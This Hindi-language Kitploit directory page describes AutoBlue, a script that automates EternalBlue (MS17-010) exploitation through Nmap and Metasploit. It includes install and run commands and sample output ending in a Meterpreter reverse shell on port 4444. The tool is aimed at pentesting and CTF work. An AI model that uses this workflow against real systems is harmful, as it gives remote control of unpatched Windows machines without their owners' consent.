Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
autoblue — AutoBlue - स्वचालित EternalBlue (CVE-2017-0144 / MS17-010) exploitation उपकरण जो नैतिक हैकिंग, पैठ परीक्षण और CTF चुनौतियों के लिए Nmap और Metasploit का उपयोग करता है। केवल अधिकृत और शैक्षिक उपयोग के लिए सख्ती से! | Kitploit
उपकरण/GitHubGitHub/atithkhawas/autoblue
भेद्यता स्कैनरपेलोड जनरेशनशोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubatithkhawas/autoblue

autoblue

AutoBlue - स्वचालित EternalBlue (CVE-2017-0144 / MS17-010) exploitation उपकरण जो नैतिक हैकिंग, पैठ परीक्षण और CTF चुनौतियों के लिए Nmap और Metasploit का उपयोग करता है। केवल अधिकृत और शैक्षिक उपयोग के लिए सख्ती से!

रिपॉजिटरी देखें
4131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

AUTOBLUE: स्वचालित EternalBlue शोषण उपकरण

AUTOBLUE एक स्वचालन उपकरण है जो विंडोज़ मशीनों पर EternalBlue भेद्यता (CVE-2017-0144) का शोषण करने के लिए डिज़ाइन किया गया है। यह उपकरण भेद्यता स्कैनिंग के लिए Nmap और शोषण के लिए Metasploit के msfconsole की शक्ति को एकीकृत करता है, जिससे उपयोगकर्ता स्वचालित रूप से संवेदनशील सिस्टम की पहचान कर सकते हैं और लक्ष्य पर दूरस्थ पहुँच प्राप्त करने के लिए EternalBlue शोषण को चला सकते हैं।

यह उपकरण मुख्य रूप से सुरक्षा पेशेवरों, पैठ परीक्षकों और नैतिक हैकर्स के लिए डिज़ाइन किया गया है जो नियंत्रित, अधिकृत वातावरण जैसे कि Capture The Flag (CTF) चुनौतियों, पैठ परीक्षण कार्यों या लैब सेटअप में काम करते हैं। AUTOBLUE उपयोगकर्ताओं को केवल लक्ष्य IP पता दर्ज करके न्यूनतम मैन्युअल हस्तक्षेप के साथ EternalBlue भेद्यता का शोषण करने की अनुमति देता है।

विशेषताएँ

  • स्वचालित भेद्यता स्कैनिंग: लक्ष्य मशीन पर EternalBlue भेद्यता (CVE-2017-0144) को स्कैन करने के लिए Nmap का उपयोग करता है।

  • सहज शोषण: EternalBlue शोषण को स्वचालित रूप से चलाने के लिए Metasploit के msfconsole का लाभ उठाता है।

  • सरल सेटअप: केवल एक लक्ष्य IP पता और Nmap और Metasploit स्थापित एक कार्यशील वातावरण की आवश्यकता होती है।

  • आउटपुट रिपोर्टिंग: शोषण प्रयास की सफलता या विफलता को इंगित करने वाला आउटपुट उत्पन्न करता है।

विषय सूची

  • पूर्वापेक्षाएँ

  • स्थापना

  • उपयोग

  • यह कैसे काम करता है

  • सुरक्षा संबंधी विचार

  • योगदान

  • लाइसेंस

  • आभार

  • अस्वीकरण

  • पूर्वापेक्षाएँ:

    AUTOBLUE का उपयोग करने से पहले, सुनिश्चित करें कि आपकी मशीन पर निम्नलिखित उपकरण स्थापित हैं:

    Nmap: संवेदनशील मशीनों का पता लगाने के लिए एक नेटवर्क स्कैनिंग उपकरण।

    Metasploit Framework: एक पैठ परीक्षण प्लेटफ़ॉर्म जिसमें EternalBlue के लिए शोषण शामिल हैं।

    Nmap स्थापित करें:

    • लिनक्स (डेबियन-आधारित) पर:

    कोड कॉपी करें

    root@kitploit:~
          sudo apt update
    

    और

    root@kitploit:~
          sudo apt install nmap
    

    विंडोज़ या macOS पर, आधिकारिक वेबसाइट से Nmap डाउनलोड करें।

    Metasploit स्थापित करें:

    लिनक्स (डेबियन-आधारित) पर:

    कोड कॉपी करें

    root@kitploit:~
          sudo apt update
    

    और

    root@kitploit:~
         sudo apt install metasploit-framework
         
    

    विंडोज़ या macOS पर, आधिकारिक वेबसाइट से Metasploit डाउनलोड करें।

    स्थापना:

    AUTOBLUE स्थापित करने के लिए, इन चरणों का पालन करें:

    • रिपॉजिटरी क्लोन करें:

      root@kitploit:~
        git clone https://github.com/AtithKhawas/autoblue.git
      

      और

      root@kitploit:~
           cd autoblue
      

    सुनिश्चित करें कि Nmap और Metasploit पूर्वापेक्षाओं के रूप में सही ढंग से स्थापित हैं।

    • स्क्रिप्ट को निष्पादन योग्य बनाएं:

      root@kitploit:~
      chmod +x autoblue.sh
      

    उपयोग:

    AUTOBLUE को EternalBlue भेद्यता के स्कैनिंग और शोषण को स्वचालित करने के लिए डिज़ाइन किया गया है। इसका उपयोग करने का तरीका यहां बताया गया है:

    • उपकरण चलाएं

    AUTOBLUE का उपयोग करने के लिए, अपने टर्मिनल में निम्नलिखित कमांड चलाएँ:

    कोड कॉपी करें

    root@kitploit:~
         ./autoblue.sh 
    

    आउटपुट:

    root@kitploit:~
         ┌──(root㉿kali)-[/home/Elliot] 
         └─# ./autoblue.sh 
         ============================================
         ********************************************
         AutoBlue    - EternalBlue Exploit Automation
         ********************************************
         ********************************************
         ------------------------Made by ATITH KHAWAS
         ============================================
         Enter Target IP Address:
    

    यह लक्ष्य IP पता और आपका IP पता पूछेगा।

    नमूना

    root@kitploit:~
          Enter Target IP Address: Target<IP Address>
          Enter Your IP Address: Your <IP Address>
    

    एक बार जब आप उपकरण चलाते हैं, यह Nmap के साथ स्कैनिंग शुरू करेगा:

    आउटपुट-1

    root@kitploit:~
     Target IP Address: ***.***.**.**
     [+] Scanning Target for MS17-010 Vulnerability...
     Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
     Nmap scan report for ***.***.**.**
     Host is up (0.19s latency).
    
     PORT    STATE SERVICE
     445/tcp open  microsoft-ds
    
     Host script results:
     | smb-vuln-ms17-010: 
     |   VULNERABLE:
     |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
     |     State: VULNERABLE
     |     IDs:  CVE:CVE-2017-0143
     |     Risk factor: HIGH
     |       A critical remote code execution vulnerability exists in Microsoft SMBv1
     |        servers (ms17-010).
     |           
     |     Disclosure date: 2017-03-14
     |     References:
     |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
     |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
     |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    
     Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
     [+] Target is VULNERABLE to EternalBlue!
    

    यहीं से वास्तविक काम शुरू होता है, समय लेने वाली प्रक्रिया को काफी कम करता है। यदि लक्ष्य संवेदनशील है, तो यह स्वचालित रूप से Msfconsole लॉन्च करता है और RHOSTS, PAYLOAD, LHOST, और LPORT को डिफ़ॉल्ट पोर्ट 4444 के साथ सेट करता है।

    आउटपुट-2

    root@kitploit:~
          [+] Launching Metasploit...
          [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
          RHOSTS => ***.***.**.**
          PAYLOAD => windows/x64/meterpreter/reverse_tcp
          LHOST => ***.***.**.**
          LPORT => 4444
          [*] Started reverse TCP handler on ***.***.**.**:4444 
    

    और हमें लक्ष्य का Meterpreter शेल देता है।

    आउटपुट-3

    root@kitploit:~
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
           meterpreter > pwd
           C:\Windows\system32
    

    यह कैसे काम करता है:

    • Nmap स्क्रिप्ट स्कैनिंग: उपकरण पहले यह पता लगाने के लिए Nmap स्क्रिप्ट स्कैन (--script smb-vuln-ms17-010) का उपयोग करता है कि लक्ष्य मशीन EternalBlue शोषण के लिए संवेदनशील है या नहीं। यह जाँचता है कि पोर्ट 445 खुला है या नहीं और SMB भेद्यताओं की पहचान करने का प्रयास करता है।

    • Metasploit शोषण: यदि लक्ष्य मशीन संवेदनशील पाई जाती है, तो AUTOBLUE Metasploit के msfconsole का उपयोग करके EternalBlue शोषण को लॉन्च करने के लिए आगे बढ़ता है। स्क्रिप्ट भेद्यता का शोषण करने के लिए आवश्यक पेलोड कॉन्फ़िगर और भेजेगी।

    • रिवर्स शेल: यदि शोषण सफल होता है, तो पीड़ित मशीन पर एक कमांड-लाइन इंटरफ़ेस प्रदान करने के लिए एक रिवर्स शेल खोला जाएगा।

    • प्रतिक्रिया: उपकरण पूरी प्रक्रिया के दौरान प्रतिक्रिया प्रदान करता है, जिसमें यह भी शामिल है कि लक्ष्य सफलतापूर्वक शोषित हुआ या नहीं, और कोई प्रासंगिक जानकारी (जैसे, रिवर्स शेल का IP पता) आउटपुट करता है।

    सुरक्षा संबंधी विचार:

    • कानूनी उपयोग: इस उपकरण का उपयोग केवल अधिकृत वातावरण में किया जाना चाहिए। सुनिश्चित करें कि आपके पास लक्ष्य मशीन का परीक्षण करने की स्पष्ट अनुमति है और यह आपके क्षेत्राधिकार में गैरकानूनी नहीं है।

    • उपयोगकर्ता इनपुट: सुनिश्चित करें कि दुरुपयोग को रोकने के लिए उपकरण में केवल विश्वसनीय IP ही डाले जाएँ। अविश्वसनीय सिस्टम पर इस उपकरण को चलाने से सुरक्षा घटनाएँ हो सकती हैं।

    • पेलोड सुरक्षा: इस उपकरण में उपयोग किया जाने वाला रिवर्स शेल पेलोड स्वाभाविक रूप से जोखिम भरा है। हमलावर मशीन या उसके सुनने वालों को अविश्वसनीय नेटवर्क में उजागर न करें।

    • निर्भरताएँ अद्यतन रखें: उन उपकरणों में ज्ञात सुरक्षा भेद्यताओं को कम करने के लिए Nmap और Metasploit को नियमित रूप से अपडेट करना सुनिश्चित करें।

    योगदान:

    AUTOBLUE परियोजना में योगदान का स्वागत है। यदि आपके पास कोई सुझाव, सुधार या बग फिक्स हैं, तो बेझिझक रिपॉजिटरी को फोर्क करें और पुल रिक्वेस्ट बनाएं।

    लाइसेंस:

    यह उपकरण ओपन-सोर्स है और MIT लाइसेंस के तहत वितरित किया गया है। आप अपनी परियोजनाओं में सॉफ़्टवेयर का उपयोग, संशोधन और वितरण करने के लिए स्वतंत्र हैं। हालाँकि, आपको यह नोटिस सॉफ़्टवेयर की सभी प्रतियों या महत्वपूर्ण भागों में शामिल करना होगा।

    आभार:

    • Nmap: आवश्यक भेद्यता स्कैनिंग कार्यक्षमता प्रदान करने के लिए।

    • Metasploit: EternalBlue भेद्यता का शोषण करने के लिए ढाँचा प्रदान करने के लिए।

    • सुरक्षा शोधकर्ता: EternalBlue भेद्यता की खोज और सार्वजनिक प्रकटीकरण के लिए, जिसने दुनिया भर में सिस्टम को सुरक्षित करने में मदद की है।

    अस्वीकरण:

    AUTOBLUE एक उपकरण है जो केवल शैक्षिक और नैतिक उपयोग के लिए है। लेखक इस उपकरण का उपयोग करके किए गए किसी भी अवैध कार्य के लिए जिम्मेदार नहीं हैं। यह आपकी जिम्मेदारी है कि सुनिश्चित करें कि आपके पास किसी भी सिस्टम पर पैठ परीक्षण करने की स्पष्ट अनुमति है।

    इस उपकरण का उपयोग अपने जोखिम पर करें। हमेशा सुरक्षित और कानूनी वातावरण में पैठ परीक्षण गतिविधियाँ संचालित करें।

    टूल डाउनलोड करें